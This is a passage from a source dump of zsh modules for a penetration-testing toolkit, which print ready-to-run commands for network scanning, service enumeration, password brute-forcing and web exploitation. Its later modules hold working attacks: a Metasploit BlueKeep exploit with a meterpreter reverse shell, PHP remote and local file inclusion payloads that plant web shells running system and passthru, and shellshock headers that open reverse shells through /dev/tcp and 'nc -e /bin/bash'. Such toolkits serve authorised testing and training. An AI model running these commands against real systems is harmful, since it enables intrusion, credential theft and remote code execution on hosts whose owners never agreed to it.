print -z "sudo masscan ${__NETWORK} -p${__TCP_PORTS} -oL $(__netpath)/masscan-top.txt"
}
qq-enum-network-masscan-windows() {
__check-project
qq-vars-set-network
print -z "sudo masscan ${__NETWORK} -p135-139,445,3389,389,636,88 -oL $(__netpath)/masscan-windows.txt"
}
qq-enum-network-masscan-linux() {
__check-project
qq-vars-set-network
print -z "sudo masscan ${__NETWORK} -p22,111,2222 -oL $(__netpath)/masscan-linux.txt"
}
qq-enum-network-masscan-web() {
__check-project
qq-vars-set-network
print -z "sudo masscan ${__NETWORK} -p80,800,8000,8080,8888,443,4433,4443 -oL $(__netpath)/masscan-web.txt"
}
================================================
FILE: modules/qq-enum-nfs.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-nfs
#############################################################
qq-enum-nfs-help() {
cat << "DOC"
qq-enum-nfs
-----------
The qq-enum-nfs namespace contains commands for scanning and
enumerating NFS services.
Commands
--------
qq-enum-nfs-install: installs dependencies
qq-enum-nfs-nmap-sweep: scan a network for services
qq-enum-nfs-tcpdump: capture traffic to and from a host
qq-enum-nfs-show: show remote NFS shares
qq-enum-nfs-mount: mount a remote NFS share locally
DOC
}
qq-enum-nfs-install() {
__info "Running $0..."
__pkgs tcpdump nmap nfs-common
}
qq-enum-nfs-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -sU -p U:111,T:111,U:2049,T:2049 ${__NETWORK} -oA $(__netpath)/nfs-sweep"
}
qq-enum-nfs-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 111 and port 2049 -w $(__hostpath)/nfs.pcap"
}
qq-enum-nfs-show() {
qq-vars-set-rhost
print -z "showmount -e ${__RHOST}"
}
qq-enum-nfs-mount() {
qq-vars-set-rhost
local share && __askvar share SHARE
mkdir -p /mnt/${share}
print -z "mount -t nfs ${__RHOST}:/${share} /mnt/${share} -o nolock"
}
================================================
FILE: modules/qq-enum-oracle.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-oracle
#############################################################
qq-enum-oracle-help() {
cat << "DOC"
qq-enum-oracle
--------------s
The qq-enum-oracle namespace contains commands for scanning and
enumerating Oracle services and databases.
Commands
--------
qq-enum-oracle-install: installs dependencies
qq-enum-oracle-nmap-sweep: scan a network for services
qq-enum-oracle-tcpdump: capture traffic to and from a host
qq-enum-oracle-sqlplus: sqlplus client
qq-enum-oracle-odat: odat anonymous enumeration
qq-enum-oracle-odat-creds: odat authenticated enumeration
qq-enum-oracle-odat-passwords: odat password brute
qq-enum-oracle-version: tnscmd version query
qq-enum-oracle-status: tnscmd status query
qq-enum-oracle-sidguess: tnscmd password brute force
qq-enum-oracle-oscanner: oscanner enumeration
qq-enum-oracle-hydra-listener: brute force passwords
qq-enum-oracle-hydra-sid: brute force passwords
DOC
}
qq-enum-oracle-install() {
__info "Running $0..."
__pkgs tcpdump nmap odat tnscmd10g sidguess oscanner hydra
__pkgs oracle-instantclient-sqlplus
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig
}
qq-enum-oracle-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p 1521 ${__NETWORK} -oA $(__netpath)/oracle-sweep"
}
qq-enum-oracle-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1521 -w $(__hostpath)/oracle.pcap"
}
qq-enum-oracle-sqlplus() {
qq-vars-set-rhost
local sid && __askvar sid "SID(DATABASE)"
local u && __askvar u "USER"
local p && __askvar [u] "PASSWORD"
print -z "sqlplus ${u}/${p}@${__RHOST}:1521/${sid} as sysdba"
}
qq-enum-oracle-odat() {
qq-vars-set-rhost
print -z "odat all -s ${__RHOST}"
}
qq-enum-oracle-odat-creds() {
qq-vars-set-rhost
local sid && __askvar sid "SID(DATABASE)"
local u && __askvar u "USER"
local p && __askvar [u] "PASSWORD"
print -z "odat all -s ${__RHOST} -p 1521 -d ${sid} -U ${u} -P ${p}"
}
qq-enum-oracle-odat-passwords() {
qq-vars-set-rhost
local sid && __askvar sid "SID(DATABASE)"
__info "cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | sed -e "s/[[:space:]]/\\\/g""
print -z "odat passwordguesser -s ${__RHOST} -d ${sid} --accounts-file accounts.txt"
}
qq-enum-oracle-version(){
qq-vars-set-rhost
print -z "tnscmd10g version -h ${__RHOST}"
}
qq-enum-oracle-status(){
qq-vars-set-rhost
print -z "tnscmd10g status -h ${__RHOST}"
}
qq-enum-oracle-sidguess(){
qq-vars-set-rhost
print -z "sidguess host=${__RHOST} port=1521 sidfile=sid.txt"
}
qq-enum-oracle-oscanner() {
qq-vars-set-rhost
print -z "oscanner -s ${__RHOST}"
}
qq-enum-oracle-hydra-listener() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-listener-hydra-brute.txt ${__RHOST} Oracle Listener"
}
qq-enum-oracle-hydra-sid() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-sid-hydra-brute.txt ${__RHOST} Oracle Sid"
}
================================================
FILE: modules/qq-enum-pop3.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-pop3
#############################################################
qq-enum-pop3-help() {
cat << "DOC"
qq-enum-pop3
------------
The qq-enum-pop3 namespace contains commands for scanning
and enumerating POP3 email services.
Commands
--------
qq-enum-pop3-install: installs dependencies
qq-enum-pop3-nmap-sweep: scan a network for services
qq-enum-pop3-tcpdump: capture traffic to and from a host
qq-enum-pop3-hydra: brute force passwords for a user account
DOC
}
qq-enum-pop3-install() {
__info "Running $0..."
__pkgs nmap tcpdump hydra
}
qq-enum-pop3-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p 110,995 ${__NETWORK} -oA $(__netpath)/pop3-sweep"
}
qq-enum-pop3-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 110 and port 995 -w $(__hostpath)/pop3.pcap"
}
qq-enum-pop3-hydra() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/pop3-hydra-brute.txt ${__RHOST} POP3"
}
================================================
FILE: modules/qq-enum-rdp.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-rdp
#############################################################
qq-enum-rdp-help() {
cat << "DOC"
qq-enum-rdp
------------
The qq-enum-rdp namespace contains commands for scanning
and enumerating RDP remote desktop services.
Commands
--------
qq-enum-rdp-install: installs dependencies
qq-enum-rdp-nmap-sweep: scan a network for services
qq-enum-rdp-tcpdump: capture traffic to and from a host
qq-enum-rdp-ncrack: brute force passwords for a user account
qq-enum-rdp-bluekeep: bluekeep exploit reference
qq-enum-rdp-msf-bluekeep-scan: bluekeep metasploit scanner
qq-enum-rdp-msf-bluekeep-exploit: bluekeep metasploit exploit
DOC
}
qq-enum-rdp-install() {
__info "Running $0..."
__pkgs nmap tcpdump ncrack metasploit-framework
}
qq-enum-rdp-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "nmap -n -Pn -sS -p3389 ${__NETWORK} -oA $(__netpath)/rdp-sweep"
}
qq-enum-rdp-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3389 -w $(__hostpath)/rdp.pcap"
}
qq-enum-rdp-ncrack() {
__check-project
qq-vars-set-rhost
__check-user
print -z "ncrack -vv --user ${__USER} -P ${__PASSLIST} rdp://${__RHOST} -oN $(__hostpath)/ncrack-rdp.txt "
}
qq-enum-rdp-bluekeep() {
__info "https://sploitus.com/exploit?id=EDB-ID:47683"
print -z "searchsploit bluekeep"
}
qq-enum-rdp-msf-bluekeep-scan() {
__check-project
qq-vars-set-rhost
local cmd="use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS ${__RHOST}; run; exit"
print -z "msfconsole -n -q -x \" ${cmd} \" | tee $(__hostpath/bluekeep-scan.txt)"
}
qq-enum-rdp-msf-bluekeep-exploit() {
qq-vars-set-rhost
qq-vars-set-lhost
qq-vars-set-lport
#__warn "Start a handler using on ${__LHOST}:${__LPORT} before proceeding"
__msf << VAR
use windows/rdp/cve_2019_0708_bluekeep_rce;
set RHOSTS ${__RHOST};
set PAYLOAD windows/x64/meterpreter/reverse_https;
set stagerverifysslcert true;
set HANDLERSSLCERT ${__SHELL_SSL_CERT};
set LHOST ${__LHOST};
set LPORT ${__LPORT};
run;
exit
VAR
}
================================================
FILE: modules/qq-enum-smb.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-smb
#############################################################
qq-enum-smb-help() {
cat << "DOC"
qq-enum-smb
------------
The qq-enum-smb namespace contains commands for scanning
and enumerating smb services.
Commands
--------
qq-enum-smb-install: installs dependencies
qq-enum-smb-nmap-sweep: scan a network for services
qq-enum-smb-tcpdump: capture traffic to and from a host
qq-enum-smb-null-smbmap: query with smbmap null session
qq-enum-smb-user-smbmap: query with smbmap authenticated session
qq-enum-smb-null-enum4: enumerate with enum4linux
qq-enum-smb-null-smbclient-list: list shares with a null session
qq-enum-smb-null-smbclient-connect: connect with a null session
qq-enum-smb-user-smbclient-connect: connect with an authenticated session
qq-enum-user-smb-mount: mount an SMB share
qq-enum-smb-samrdump: dump info using impacket
qq-enum-smb-responder: spoof and get responses using responder
qq-enum-smb-net-use-null: print a net use statement for windows
qq-enum-smb-nbtscan: scan a local network
qq-enum-smb-rpcclient: use rcpclient for queries
DOC
}
qq-enum-smb-install() {
__info "Running $0..."
__pkgs nmap tcpdump smbmap enum4linux smbclient impacket-scripts responder nbtscan rpcclient
}
qq-enum-smb-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "nmap -n -Pn -sS -sU -p445,137-139 ${__NETWORK} -oA $(__netpath)/smb-sweep"
}
qq-enum-smb-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 445 -w $(__hostpath)/smb.pcap"
}
qq-enum-smb-null-smbmap() {
qq-vars-set-rhost
print -z "smbmap -H ${__RHOST}"
}
qq-enum-smb-user-smbmap() {
qq-vars-set-rhost
__check-user
__info "Usage with creds: -u <user> -p <pass> -d <domain>"
print -z "smbmap -u ${__USER} -H ${__RHOST}"
}
qq-enum-smb-null-enum4() {
qq-vars-set-rhost
print -z "enum4linux -a ${__RHOST} | tee $(__hostpath)/enum4linux.txt "
}
qq-enum-smb-null-smbclient-list() {
qq-vars-set-rhost
print -r -z "smbclient -L \\\\\\\\${__RHOST} -N "
}
qq-enum-smb-null-smbclient-connect() {
qq-vars-set-rhost
__check-share
print -r -z "smbclient \\\\\\\\${__RHOST}\\\\${__SHARE} -N "
}
qq-enum-smb-user-smbclient-connect() {
qq-vars-set-rhost
__check-user
__check-share
print -r -z "smbclient \\\\\\\\${__RHOST}\\\\${__SHARE} -U ${__USER} "
}
qq-enum-user-smb-mount() {
qq-vars-set-rhost
__check-user
local p && __askvar p PASSWORD
__check-share
print -z "mount //${__RHOST}/${__SHARE} /mnt/${__SHARE} -o username=${__USER},password=${p}"
}
qq-enum-smb-samrdump() {
qq-vars-set-rhost
print -z "python3 ${__IMPACKET}/samrdump.py ${__RHOST}"
}
qq-enum-smb-responder() {
qq-vars-set-iface
print -z "responder -I ${__IFACE} -A"
}
qq-enum-smb-net-use-null() {
qq-vars-set-rhost
__info "net use \\\\\\\\${__RHOST}\\IPC$ \"\" /u:\"\" "
}
qq-enum-smb-nbtscan() {
qq-vars-set-network
print -z "nbtscan ${__NETWORK}"
}
qq-enum-smb-rpcclient() {
qq-vars-set-rhost
print -z "rpcclient -U \" \" ${__RHOST}"
}
================================================
FILE: modules/qq-enum-web-aws.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-aws
#############################################################
qq-enum-web-aws-help() {
cat << "DOC"
qq-enum-web-aws
---------------
The qq-enum-web-aws namespace contains commands for scanning
and enumerating AWS hosted services.
Commands
--------
qq-enum-web-aws-install: installs dependencies
qq-enum-web-aws-s3-ls: use the awscli to list files in an S3 bucket
qq-enum-web-aws-s3-write: use the awscli to copy a local file to an S3 bucket
qq-enum-web-aws-s3-scanner: scan a list of buckets
DOC
}
qq-enum-web-aws-install() {
__info "Running $0..."
__pkgs awscli
qq-install-s3scanner
}
qq-enum-web-aws-s3-ls() {
qq-vars-set-rhost
print -z "aws s3 ls s3://${__RHOST} --recursive"
}
qq-enum-web-aws-s3-write() {
qq-vars-set-rhost
__ask "Select a file to copy to the S3 bucket"
local f && __askpath f FILE $(pwd)
print -z "aws s3 cp \"${f}\" s3://${__RHOST}"
}
qq-enum-web-aws-s3-scanner() {
__ask "Select a file that contains a list of S3 buckets"
local f && __askpath f FILE $(pwd)
__info "Use -d to dump buckets to local path"
print -z "python3 ${__TOOLS}/S3Scanner/s3scanner.py ${f}"
}
================================================
FILE: modules/qq-enum-web-dirs.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-dirs
#############################################################
qq-enum-web-dirs-help() {
cat << "DOC"
qq-enum-web-dirs
----------------
The qq-enum-web-dirs namespace contains commands for discovering web content, directories and files.
Commands
--------
qq-enum-web-dirs-install: installs dependencies
qq-enum-web-dirs-robots: get robots.txt using curl
qq-enum-web-dirs-parsero: parse complex robots.txt with parsero
qq-enum-web-dirs-wfuzz: brute force dirs and files with wfuzz
qq-enum-web-dirs-ffuf: brute force dirs and files with ffuf
qq-enum-web-dirs-gobuster: brute force dirs and files with gobuster
DOC
}
qq-enum-web-dirs-install() {
__info "Running $0..."
__pkgs parsero gobuster wfuzz curl seclists wordlists
qq-install-golang
go get -u github.com/ffuf/ffuf
go get -v -u github.com/tomnomnom/httprobe
}
qq-enum-web-dirs-robots() {
__check-project
qq-vars-set-url
print -z "curl -s -L --user-agent \"${__UA}\" \"${__URL}/robots.txt\" | tee $(__urlpath)/robots.txt"
}
qq-enum-web-dirs-parsero() {
__check-project
qq-vars-set-url
print -z "parsero -u \"${__URL}\" -o -sb | tee $(__urlpath)/robots.txt"
}
qq-enum-web-dirs-wfuzz() {
__check-project
qq-vars-set-url
qq-vars-set-wordlist
local d && __askvar d "RECURSION DEPTH"
print -z "wfuzz -s 0.1 -R${d} --hc=404 -w ${__WORDLIST} ${__URL}/FUZZ --oF $(__urlpath)/wfuzz-dirs.txt"
}
qq-enum-web-dirs-ffuf() {
__check-project
qq-vars-set-url
qq-vars-set-wordlist
__check-threads
local d && __askvar d "RECURSION DEPTH"
print -z "ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \"User-Agent: Mozilla\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -o $(__urlpath)/ffuf-dirs.csv -of csv"
}
qq-enum-web-dirs-gobuster() {
__check-project
qq-vars-set-url
qq-vars-set-wordlist
__check-threads
print -z "gobuster dir -u ${__URL} -a \"${__UA}\" -t1 -k -w ${__WORDLIST} | tee $(__urlpath)/gobuster-dirs.txt "
}
================================================
FILE: modules/qq-enum-web-eslastic.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-elastic
#############################################################
qq-enum-web-elastic-help() {
cat << "DOC"
qq-enum-web-elastic
-------------------
The qq-enum-web-elastic namespace contains commands for scanning and enumerating
elastic search services.
Commands
--------
qq-enum-web-elastic-install: installs dependencies
qq-enum-web-elastic-nmap: scan the target using the elasticsearch nmap nse script
qq-enum-web-elastic-health: query the target using curl for cluster health
qq-enum-web-elastic-indices: query the target using curl for indices
qq-enum-web-elastic-search: query an index using curl
qq-enum-web-elastic-all: query for 1000 records in an index using curl
DOC
}
qq-enum-web-elastic-install() {
__info "Running $0..."
__pkgs nmap curl
qq-install-nmap-elasticsearch-nse
}
qq-enum-web-elastic-nmap() {
__check-project
qq-vars-set-rhost
print -z "sudo nmap -n -Pn -p9200 --script=elasticsearch ${__RHOST} -oN $(__hostpath)/nmap-elastic.txt"
}
qq-enum-web-elastic-health() {
qq-vars-set-url
print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/_cluster/health?pretty\""
}
qq-enum-web-elastic-indices() {
qq-vars-set-url
print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/_cat/indices?v\""
}
qq-enum-web-elastic-search() {
qq-vars-set-url
local i && __askvar i "INDEX"
__ask "Enter a query, such as *:password"
local q && __askvar q "QUERY"
print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/${i}/_search?q=${q}&size=10&pretty\""
}
qq-enum-web-elastic-all() {
__check-project
qq-vars-set-url
local i && __askvar i "INDEX"
print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/${i}/_search?size=1000\" | tee $(__urlpath)/elastic-docs.json"
}
================================================
FILE: modules/qq-enum-web-fuzz.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-fuzz
#############################################################
qq-enum-web-fuzz-help() {
cat << "DOC"
qq-enum-web-fuzz
--------------
The qq-enum-web-fuzz namespace contains commands for fuzzing
inputs of web applications
Commands
--------
qq-enum-web-fuzz-install: installs dependencies
qq-enum-web-fuzz-auth-basic-payloads: generate base64 encoded credentials
qq-enum-web-fuzz-auth-basic-ffuf: brute force basic auth
qq-enum-web-fuzz-auth-json-ffuf: brute force basic auth with json post
qq-enum-web-fuzz-auth-post-ffuf: brute force auth with post
qq-enum-web-fuzz-auth-post-wfuzz: brute force auth with post
qq-enum-web-brute-hydra-get: brute force auth with get
qq-enum-web-brute-hydra-form-post: brute force auth with post
DOC
}
qq-enum-web-fuzz-install() {
__info "Running $0..."
__pkgs seclists wordlists wfuzz hydra
qq-install-golang
go get -u github.com/ffuf/ffuf
}
qq-enum-web-fuzz-auth-basic-payloads() {
qq-vars-set-wordlist
__check-user
print -z "file=\"${f}\"; while IFS= read line; do; echo -n \"${__USER}:\$line\" | base64 ; done <\"\$file\" > payloads.b64"
}
# ffuf
qq-enum-web-fuzz-auth-basic-ffuf() {
qq-vars-set-url
__ask "Select file containing authorization header payloads"
local f && __askpath f FILE $(pwd)
__check-threads
print -z "ffuf -t ${__THREADS} -p \"0.1\" -w ${f} -H \"Authorization: Basic FUZZ\" -fc 401 -u ${__URL} "
}
qq-enum-web-fuzz-auth-json-ffuf() {
qq-vars-set-url
__check-threads
print -z "ffuf -t ${__THREADS} -p \"0.1\" -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt -u ${__URL} -X POST -H \"Content-Type: application/json\" -d '{\"username\": \"FUZZ\", \"password\": \"FUZZ\"}' -fr \"error\" "
}
qq-enum-web-fuzz-auth-post-ffuf() {
qq-vars-set-url
local uf && __askvar uf USER_FIELD
local uv && __askvar uv USER_VALUE
local pf && __askvar pf PASSWORD_FIELD
__check-threads
print -z "ffuf -t ${__THREADS} -p \"0.1\" -w ${__PASSLIST} -H \"Content-Type: application/x-www-form-urlencoded\" -X POST -d \"${uf}=${uv}&${pf}=FUZZ\" -u ${__URL} -fs 75 "
}
# wfuzz
qq-enum-web-fuzz-auth-post-wfuzz() {
qq-vars-set-url
local uf && __askvar uf USER_FIELD
local uv && __askvar uv USER_VALUE
local pf && __askvar pf PASSWORD_FIELD
print -z "wfuzz -c -w ${__PASSLIST} -d \"${uf}=${uv}&${pf}=FUZZ\" --sc 302 ${__URL}"
}
qq-enum-web-brute-hydra-get() {
qq-vars-set-rhost
__check-user
__ask "Enter the URI for the get request, ex: /path"
local uri && __askvar uri URI
print -z "hydra -l ${__USER} -P ${__PASSLIST} ${__RHOST} http-get ${uri}"
}
qq-enum-web-brute-hydra-form-post() {
qq-vars-set-rhost
__ask "Enter the URI for the post request, ex: /path"
local uri && __askvar uri URI
local uf && __askvar uf USER_FIELD
local uv && __askvar uv USER_VALUE
local pf && __askvar pf PASSWORD_FIELD
__ask "Enter the response value to check for failure"
local fm && __askvar fm FAILURE
print -z "hydra ${__RHOST} http-form-post \"${uri}:${uf}=^USER^&${pf}=^PASS^:${fm}\" -l ${uv} -P ${__PASSLIST} -t 10 -w 30 "
}
================================================
FILE: modules/qq-enum-web-js.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-js
#############################################################
qq-enum-web-js-help() {
cat << "DOC"
qq-enum-web-js
--------------
The qq-enum-web-js namespace contains commands for enumerating
javascript files and mining for urls and secrets.
Commands
--------
qq-enum-web-js-install: installs dependencies
qq-enum-web-js-beautify: beautify JS file
qq-enum-web-js-link-finder-url: run linkfinder on a file
qq-enum-web-js-link-finder-domain: run linkfinder on all files of a site
qq-enum-web-js-curl: enumerate links using curl
DOC
}
qq-enum-web-js-install() {
__info "Running $0..."
__pkgs jsbeautifier qq-install-link-finder
qq-install-node
npm i -g eslint
}
qq-enum-web-js-beautify() {
local f && __askpath f FILE $(pwd)
print -z "js-beautify ${f} > source-$(basename ${f})"
}
qq-enum-web-js-link-finder-url() {
__check-project
__ask "Set the URL of a javascript file"
qq-vars-set-url
print -z "python3 linkfinder.py -i ${__URL} -o $(__urlpath)/js-links.html"
}
qq-enum-web-js-link-finder-domain() {
__check-project
qq-vars-set-url
print -z "python3 linkfinder.py -i ${__URL} -d -o $(__urlpath)/js-links-all.html"
}
qq-enum-web-js-curl() {
qq-vars-set-url
curl -Lks ${__URL} | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=${__URL} '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""
}
================================================
FILE: modules/qq-enum-web-php.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-php
#############################################################
qq-enum-web-php-help() {
cat << "DOC"
qq-enum-web-php
----------------
The qq-enum-web-php namespace contains commands for discovering web content, directories and files
on PHP web servers
Commands
--------
qq-enum-web-php-install: installs dependencies
qq-enum-web-php-ffuf: scan for PHP files
qq-enum-web-php-rfi: exploit typical RFI params
qq-enum-web-php-rfi-input
qq-enum-web-php-lfi-proc-self-environ
qq-enum-web-php-lfi-filter-resource
qq-enum-web-php-lfi-zip-jpg-shell
qq-enum-web-php-lfi-logfile
qq-enum-web-php-gen-htaccess: generate an htaccess file
qq-enum-web-php-phpinfo: generate phpinfo payload
DOC
}
qq-enum-web-php-install() {
__info "Running $0..."
__pkgs curl seclists wordlists
qq-install-golang
go get -u github.com/ffuf/ffuf
go get -v -u github.com/tomnomnom/httprobe
}
qq-enum-web-php-ffuf() {
__check-project
qq-vars-set-url
qq-vars-set-wordlist
__check-threads
local d && __askvar d "RECURSION DEPTH"
print -z "ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \"User-Agent: Mozilla\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -e ${__EXT_PHP} -o $(__urlpath)/ffuf-dirs-php.csv -of csv"
}
qq-enum-web-php-rfi() {
__ask "URL should contain a URI like /page.php?rfi="
qq-vars-set-url
__ask "PAYLOAD URL should contain reverse php shell"
local p && __askvar p PAYLOAD_URL
print -z "curl -k -v -XGET \"${__URL}${p}%00\" "
}
qq-enum-web-php-rfi-input() {
__ask "URL should contain a URI like /page.php?rfi="
qq-vars-set-url
print -z "curl -k -v -XPOST --data \"<?php echo shell_exec('whoami'); ?>\" \"${__URL}php://input%00\" "
}
qq-enum-web-php-lfi-proc-self-environ() {
__ask "URL should contain a URI like /page.php?lfi="
qq-vars-set-url
print -z "curl -k -v -A \"<?=phpinfo(); ?>\" \"${__URL}../../../proc/self/environ\" "
}
qq-enum-web-php-lfi-filter-resource(){
__ask "URL should contain a URI like /page.php?lfi="
qq-vars-set-url
__ask "Set path to a remote file"
local f && __askvar f REMOTE_FILE
print -z "curl -k -v -XGET \"${__URL}php://filter/convert.base64-encode/resource=${f}\" "
}
qq-enum-web-php-lfi-zip-jpg-shell() {
__ask "URL should contain a URI like /page.php?lfi="
qq-vars-set-url
echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php
zip payload.zip payload.php
mv payload.zip shell.jpg
__info "Created shell.jpg"
__warn "First upload shell.jpg to target"
print -z "curl -k -v -XGET \"${__URL}zip://shell.jpg%23payload.php?cmd=\" "
}
qq-enum-web-php-lfi-logfile() {
__ask "URL should contain a URI like /page.php?lfi="
qq-vars-set-url
local b && __askvar b "TARGET URL"
curl -s "${b}/<?php passthru(\$_GET['cmd']); ?>"
__info "lfi request completed"
print -z "curl -k -v \"${__URL}../../../../../var/log/apache2/access.log&cmd=whoami\" "
}
qq-enum-web-php-gen-htaccess() {
local e && __askvar e Extension
__ask "Upload .htaccess file to make alt extension executable by PHP"
print -z "echo \"AddType application/x-httpd-php ${e}\" > htaccess"
}
qq-enum-web-php-phpinfo() {
print -z "echo \"<html><body><p>PHP INFO PAGE</p><br /><?php phpinfo(); ?></body></html>\" > phpinfo.php"
}
================================================
FILE: modules/qq-enum-web-ssl.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-ssl
#############################################################
qq-enum-web-ssl-help() {
cat << "DOC"
qq-enum-web-ssl
----------------
The enum-web-ssl namespace contains commands for enumerating SSL/TLS.
Commands
--------
qq-enum-web-ssl-install: installs dependencies
qq-enum-web-ssl-tcpdump: capture traffic to and from target
qq-enum-web-ssl-der-to-crt: convert a .der file to .crt
qq-enum-web-ssl-crt-ca-install: install a root certificate (.crt)
qq-enum-web-ssl-certs: display cert from a url
qq-enum-web-ssl-cert-download: download certs from a url
qq-enum-web-ssl-testssl-full:
qq-enum-web-ssl-testssl-ciphers:
DOC
}
qq-enum-web-ssl-install() {
__info "Running $0..."
__pkgs curl nmap tcpdump openssl testssl
}
qq-enum-web-ssl-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 443 -w $(__hostpath)/ssl.pcap"
}
qq-enum-web-ssl-der-to-crt() {
__ask "Select the cacert.der file"
local f && __askpath f FILE $(pwd)
print -z "sudo openssl x509 -inform DER -in ${f} -out cacert.crt"
}
qq-enum-web-ssl-crt-ca-install() {
__ask "Select the cacert.crt file"
local f && __askpath f FILE $(pwd)
print -z "sudo cp ${f} /usr/local/share/ca-certificates/. && sudo update-ca-certificates"
}
qq-enum-web-ssl-certs() {
qq-vars-set-url
print -z "openssl s_client -showcerts -connect ${__URL}:443"
}
qq-enum-web-ssl-cert-download() {
__check-project
qq-vars-set-url
local d=$(echo "${__URL}" | cut -d/ -f3)
print -z "openssl s_client -servername ${d} -connect ${d}:443 </dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-DOC CERTIFICATE-/p' > $(__urlpath)/ssl.certificate.`date +"%Y%m%d-%H%M%S"`.pem"
}
qq-enum-web-ssl-testssl-full() {
__check-project
qq-vars-set-url
print -z "testssl --color=3 -oA $(__urlpath)/testssl.full.`date +"%Y%m%d-%H%M%S"` ${__URL} "
}
qq-enum-web-ssl-testssl-ciphers() {
__check-project
qq-vars-set-url
print -z "testssl -E --color=3 -oA $(__urlpath)/testssl.ciphers.`date +"%Y%m%d-%H%M%S"` ${__URL} "
}
================================================
FILE: modules/qq-enum-web-vuln.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-vuln
#############################################################
qq-enum-web-vuln-help() {
cat << "DOC"
qq-enum-web-vuln
----------------
The enum-web-vuln namespace contains commands for discovering web vulnerabilities.
Commands
--------
qq-enum-web-vuln-install: installs dependencies
qq-enum-web-vuln-nikto: scan a target for web vulnerabilities
qq-enum-web-vuln-nmap-rfi: scan for potential rfi uri's
qq-enum-web-vuln-shellshock-agent: create a shellshock payload for user-agent
qq-enum-web-vuln-shellshock-nc: attempt shellshock with a reverse shell payload
qq-enum-web-vuln-put-curl: attempt to PUT a file with curl
qq-enum-web-vuln-padbuster-check: test for padbuster
qq-enum-web-vuln-padbuster-forge: exploit with padbuster
DOC
}
qq-enum-web-vuln-install() {
__info "Running $0..."
__pkgs nikto curl nmap padbuster
}
qq-enum-web-vuln-nikto() {
__check-project
qq-vars-set-url
print -z "nikto -useragent \"${__UA}\" -h \"${__URL}\" -o $(__urlpath)/nikto.txt"
}
qq-enum-web-vuln-nmap-rfi() {
qq-vars-set-rhost
print -z "nmap -vv -n -Pn -p80 --script http-rfi-spider --script-args http-rfi-spider.url='/' ${__RHOST}"
}
qq-enum-web-vuln-shellshock-agent() {
qq-vars-set-lhost
qq-vars-set-lport
__ok "Copy the header value below to use in your exploit"
cat << DOC
User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/${__LHOST}/${__LPORT} 0>&1
DOC
}
qq-enum-web-vuln-shellshock-nc() {
qq-vars-set-lhost
qq-vars-set-lport
qq-vars-set-rhost
__warn "Start a netcat listener for ${__LHOST}:${__LPORT}"
print -z "curl -A '() { :; }; /bin/bash -c \"/usr/bin/nc ${__LHOST} ${__LPORT} -e /bin/bash\"' \"http://${__RHOST}/cgi-bin/status\""
}
qq-enum-web-vuln-put-curl() {
